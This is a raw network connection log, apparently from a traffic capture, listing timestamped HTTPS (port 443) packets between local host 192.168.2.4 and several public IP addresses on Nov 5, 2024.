                                                                                                                                    Nov 5, 2024 09:03:22.881647110 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.881815910 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.881877899 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.882333994 CET4434986313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.882390022 CET4434986313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.882438898 CET49863443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.882445097 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.882491112 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.882891893 CET49863443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.882911921 CET4434986313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.882921934 CET49863443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.882927895 CET4434986313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.884866953 CET4434986213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.884917974 CET4434986213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.884964943 CET49862443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.885101080 CET49862443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.885108948 CET4434986213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.885121107 CET49862443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.885124922 CET4434986213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.885673046 CET49877443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.885685921 CET4434987713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.885844946 CET49877443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.886050940 CET4434986513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.886089087 CET4434986513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.886137009 CET49865443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.886162996 CET49877443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.886173964 CET4434987713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.886364937 CET49865443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.886380911 CET4434986513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.886392117 CET49865443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.886396885 CET4434986513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.887736082 CET49878443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.887757063 CET4434987813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.887825966 CET49878443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.888032913 CET49878443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.888045073 CET4434987813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.888541937 CET49879443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.888550043 CET4434987913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.888611078 CET49879443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.888717890 CET49879443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.888722897 CET4434987913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.896750927 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.896769047 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.896820068 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:22.896827936 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.896857977 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:22.896872044 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:22.897722960 CET4434986413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.898296118 CET4434986413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.898338079 CET49864443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.898389101 CET49864443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.898401022 CET4434986413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.898411036 CET49864443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.898416042 CET4434986413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.900365114 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.900722027 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.900752068 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.900770903 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.900778055 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.900825024 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.900835037 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.901190996 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.901221991 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.901238918 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.901246071 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.901285887 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.903222084 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.903274059 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.903276920 CET49880443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.903302908 CET4434988013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.903356075 CET49880443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.903724909 CET49880443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.903736115 CET4434988013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.903846979 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.903913975 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.904227018 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.904277086 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.913222075 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.913295031 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.913350105 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.913372993 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.913655043 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.913682938 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.913706064 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.913712978 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.913912058 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.914247036 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.914557934 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.914603949 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.914609909 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.915162086 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.915167093 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.919666052 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.919719934 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.919884920 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.919929981 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.922301054 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.922353029 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.922494888 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.922542095 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.935079098 CET4434987413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.935148001 CET4434987413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.935205936 CET49874443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.935275078 CET49874443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.935281038 CET4434987413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.935290098 CET49874443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.935293913 CET4434987413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.937248945 CET49881443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.937267065 CET4434988113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.937325954 CET49881443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.937465906 CET49881443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:22.937479019 CET4434988113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.942071915 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.943305969 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.943353891 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.943511963 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.943557024 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.960697889 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.960701942 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.960724115 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.978176117 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.978396893 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.978427887 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.978447914 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.978456020 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.978672028 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.978677034 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.978790998 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.978835106 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.978840113 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.979156017 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.979229927 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.979237080 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.979556084 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.979590893 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.979630947 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.979639053 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.979813099 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.991323948 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:22.991331100 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.994682074 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.994721889 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.994739056 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.994745016 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.994771004 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.994786024 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:22.996449947 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:22.996503115 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.004482031 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.004534960 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.004815102 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.004874945 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.005399942 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.005440950 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.005451918 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.005458117 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.005502939 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.006514072 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.014097929 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.014116049 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.014158964 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:23.014169931 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.014197111 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:23.014214993 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:23.022089005 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.022120953 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.022135973 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.022142887 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.022244930 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.022284985 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.022494078 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.022531986 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.022537947 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.022834063 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.022901058 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.023062944 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.023114920 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.023796082 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.023816109 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.023845911 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.023853064 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.023885012 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.024286032 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.024339914 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.040211916 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.040257931 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.040262938 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.040268898 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.040319920 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.040967941 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041030884 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041078091 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.041085958 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041227102 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041260004 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.041265011 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041310072 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041338921 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041379929 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.041388035 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041429043 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.041663885 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041726112 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.041804075 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.041807890 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.042474985 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.042531013 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.070858002 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.085273027 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.085324049 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.085916042 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.085975885 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.086014986 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.086040974 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.086050987 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.086090088 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.086154938 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.086160898 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.087284088 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.087330103 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.093734980 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.094121933 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.094153881 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.094173908 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.094180107 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.094217062 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.094269037 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.094559908 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.094603062 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.094609976 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.094866991 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.094898939 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.094914913 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.094922066 CET44349871162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.095005035 CET49871443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.106628895 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.106688976 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.113708973 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.113718033 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.113742113 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.113781929 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.113787889 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.113814116 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.113816023 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.113852978 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.116229057 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.116292953 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.116508961 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.116559029 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.116564989 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.116590977 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.116632938 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.116960049 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.116967916 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.117480993 CET49882443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.117495060 CET44349882162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.117566109 CET49882443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.118307114 CET49882443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.118318081 CET44349882162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.124316931 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.124322891 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.124602079 CET49883443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.124625921 CET44349883162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.124685049 CET49883443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.125983000 CET49883443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.125992060 CET44349883162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.126879930 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.126899958 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.126933098 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.126956940 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:23.126964092 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.127007961 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:23.127022982 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:23.135092020 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.138087034 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.138120890 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.138145924 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:23.138150930 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.138195038 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:23.142147064 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.142198086 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.142204046 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.142235994 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.142250061 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.142277956 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:23.144030094 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.144197941 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.144248009 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.144254923 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.145164967 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.145221949 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.145229101 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.145457029 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.145487070 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.145500898 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.145509005 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.145579100 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.164541960 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.164983988 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.165013075 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.165050030 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.165061951 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.165105104 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:23.165110111 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.165328026 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:23.165483952 CET44349869104.17.249.203192.168.2.4
